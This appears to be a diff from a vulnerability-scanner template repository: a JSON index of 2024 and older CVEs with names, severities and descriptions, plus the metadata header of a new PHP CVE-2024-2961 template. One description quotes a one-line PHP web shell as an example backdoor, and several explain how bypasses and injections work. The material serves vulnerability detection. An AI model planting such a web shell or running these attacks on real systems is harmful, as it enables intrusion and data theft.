{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-44349","Info":{"Name":"AnteeoWMS \u003c v4.7.34 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44349.yaml"}
{"ID":"CVE-2024-4439","Info":{"Name":"WordPress Core \u003c6.5.2 - Cross-Site Scripting","Severity":"high","Description":"WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2024/CVE-2024-4439.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45216","Info":{"Name":"Apache Solr - Authentication Bypass","Severity":"critical","Description":"Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr- from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45216.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45488","Info":{"Name":"SafeGuard for Privileged Passwords \u003c 7.5.2 - Authentication Bypass","Severity":"critical","Description":"One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45488.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
{"ID":"CVE-2024-46310","Info":{"Name":"FXServer \u003c v9601 - Information Exposure","Severity":"medium","Description":"Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-46310.yaml"}
{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"}
{"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"}
{"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"}
{"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"}
{"ID":"CVE-2024-4841","Info":{"Name":"LoLLMS WebUI - Subfolder Prediction via Path Traversal","Severity":"medium","Description":"A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.\n","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2024/CVE-2024-4841.yaml"}
{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"}
{"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"}
{"ID":"CVE-2024-48914","Info":{"Name":"Vendure - Arbitrary File Read","Severity":"critical","Description":"Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-48914.yaml"}
{"ID":"CVE-2024-4940","Info":{"Name":"Gradio - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in the gradio-app/gradio, affecting the latest version. The vulnerability allows an attacker to redirect users to arbitrary websites, which can be exploited for phishing attacks, Cross-site Scripting (XSS), Server-Side Request Forgery (SSRF), amongst others. This issue is due to improper validation of user-supplied input in the handling of URLs. Attackers can exploit this vulnerability by crafting a malicious URL that, when processed by the application, redirects the user to an attacker-controlled web page.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2024/CVE-2024-4940.yaml"}
{"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"}
{"ID":"CVE-2024-49757","Info":{"Name":"Zitadel - User Registration Bypass","Severity":"high","Description":"The open-source identity infrastructure software Zitadel allows administrators to disable the user self-registration. Due to a missing security check in versions prior to 2.64.0, 2.63.5, 2.62.7, 2.61.4, 2.60.4, 2.59.5, and 2.58.7, disabling the \"User Registration allowed\" option only hid the registration button on the login page. Users could bypass this restriction by directly accessing the registration URL (/ui/login/loginname) and register a user that way. Versions 2.64.0, 2.63.5, 2.62.7, 2.61.4, 2.60.4, 2.59.5, and 2.58.7 contain a patch. No known workarounds are available.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-49757.yaml"}
{"ID":"CVE-2024-5084","Info":{"Name":"Hash Form \u003c= 1.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The Hash Form Drag \u0026 Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5084.yaml"}
{"ID":"CVE-2024-5217","Info":{"Name":"ServiceNow - Incomplete Input Validation","Severity":"critical","Description":"ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5217.yaml"}
{"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"}
@ -2621,6 +2666,7 @@
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
{"ID":"CVE-2024-5910","Info":{"Name":"Palo Alto Expedition - Admin Account Takeover","Severity":"critical","Description":"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-5910.yaml"}
{"ID":"CVE-2024-5932","Info":{"Name":"GiveWP - PHP Object Injection","Severity":"critical","Description":"The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5932.yaml"}
{"ID":"CVE-2024-5936","Info":{"Name":"PrivateGPT \u003c 0.5.0 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in imartinez/privategpt version 0.5.0 due to improper handling of the 'file' parameter. This vulnerability allows attackers to redirect users to a URL specified by user-controlled input without proper validation or sanitization.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-5936.yaml"}
{"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"}
@ -2633,6 +2679,7 @@
{"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"}
{"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"}
{"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"}
{"ID":"CVE-2024-6420","Info":{"Name":"Hide My WP Ghost \u003c 5.2.02 - Hidden Login Page Disclosure","Severity":"high","Description":"The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-6420.yaml"}
{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"}
{"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting users session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"}
{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"}
@ -2670,10 +2717,18 @@
{"ID":"CVE-2024-8503","Info":{"Name":"VICIdial - SQL Injection","Severity":"critical","Description":"An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8503.yaml"}
{"ID":"CVE-2024-8517","Info":{"Name":"SPIP BigUp Plugin - Remote Code Execution","Severity":"critical","Description":"SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8517.yaml"}
{"ID":"CVE-2024-8522","Info":{"Name":"LearnPress WordPress LMS - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8522.yaml"}
{"ID":"CVE-2024-8698","Info":{"Name":"Keycloak - SAML Core Package Signature Validation Flaw","Severity":"high","Description":"A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.\n","Classification":{"CVSSScore":"7.7"}},"file_path":"http/cves/2024/CVE-2024-8698.yaml"}
{"ID":"CVE-2024-8752","Info":{"Name":"WebIQ 2.15.9 - Directory Traversal","Severity":"high","Description":"The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8752.yaml"}
{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
{"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
{"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
{"ID":"CVE-2024-9061","Info":{"Name":"WP Popup Builder Popup Forms and Marketing Lead Generation \u003c= 1.3.5 - Arbitrary Shortcode Execution","Severity":"high","Description":"The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-9061.yaml"}
{"ID":"CVE-2024-9234","Info":{"Name":"GutenKit \u003c= 2.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9234.yaml"}
{"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"}
{"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"high","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"}
{"ID":"CVE-2024-9593","Info":{"Name":"Time Clock \u003c= 1.2.2 \u0026 Time Clock Pro \u003c= 1.1.4 - Remote Code Execution","Severity":"high","Description":"The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-9593.yaml"}
{"ID":"CVE-2024-9617","Info":{"Name":"Danswer - Insecure Direct Object Reference","Severity":"medium","Description":"The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-9617.yaml"}
{"ID":"CVE-2024-9796","Info":{"Name":"WordPress WP-Advanced-Search \u003c= 3.3.9 - SQL Injection","Severity":"critical","Description":"The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9796.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
6fdd731017b724b4060a3d50f024dd9f
834a3ed8fe3e7171d2135982772985b0

60
dast/cves/2024/CVE-2024-2961.yaml Normal file
View File

@ -0,0 +1,60 @@
id: CVE-2024-2961
info:
name: PHP - LFR to Remote Code Execution
author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723
severity: high
description: |
PHP Local File Read vulnerability leading to Remote Code Execution
impact: |
Remote attackers can execute arbitrary code on the server
remediation: |
Update PHP to the latest version and sanitize user input to prevent LFR attacks
reference:
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
